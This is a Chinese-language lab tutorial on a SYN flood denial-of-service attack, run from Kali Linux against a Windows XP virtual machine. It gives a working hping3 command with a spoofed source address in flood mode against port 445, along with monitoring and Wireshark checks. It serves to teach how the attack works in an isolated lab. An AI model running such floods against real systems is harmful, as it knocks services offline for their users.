网络应用实例(二)SYN Flooding攻击

SYN Flooding攻击

 

一、实验环境

二、实验原理

三、实验步骤

1.查看IP地址

2.连通性测试

3.监控CPU资源的占用率

4.SYN Flooding攻击

5.查看攻击效果

6.抓包查看


一、实验环境

1.攻击机:Kali Linux

2.靶  机:Windows XP

3.网卡连接:NAT(Vmnet 8)

4.IP地址:自动获取(通过Vmware软件自动分配IP地址)

二、实验原理

SYN Flooding攻击是一种很古老的攻击,其实质是DOS(即拒绝服务攻击),该攻击是利用TCP/IP的三次握手,利用大量虚假的IP身份建立不完整连接,消耗目标主机的CPU。从而使目标主机近于瘫痪。

三、实验步骤

1.查看IP地址

Kali Linux:ifconfig eth0
Windows XP:ipconfig /all

网络应用实例(二)SYN Flooding攻击_第1张图片

网络应用实例(二)SYN Flooding攻击_第2张图片

2.连通性测试

Windows XP:关闭防火墙
Kali Linux:ping  WindowsXP的IP地址

网络应用实例(二)SYN Flooding攻击_第3张图片

网络应用实例(二)SYN Flooding攻击_第4张图片

3.监控CPU资源的占用率

Windows XP:打开任务管理器---性能(监控CPU资源的占用率)

网络应用实例(二)SYN Flooding攻击_第5张图片

4.SYN Flooding攻击

hping3 -q -n -a 2.2.2.2 -S -s 53 --keep -p 445 --flood 192.168.93.132
    
    #hping3 -q -n -a 伪造源IP地址 -S -s 伪造源端口 --keep -p 攻击的目标端口 --flood  目标IP

5.查看攻击效果

查看Windows XP的CPU资源占用率是否为100%,或是居高不下

网络应用实例(二)SYN Flooding攻击_第6张图片

6.抓包查看

在物理机上启动WireShark,选择Vmnet8网卡

抓包查看是否有大量的源地址为2.2.2.2的TCP包

网络应用实例(二)SYN Flooding攻击_第7张图片

你可能感兴趣的:(网络应用实例)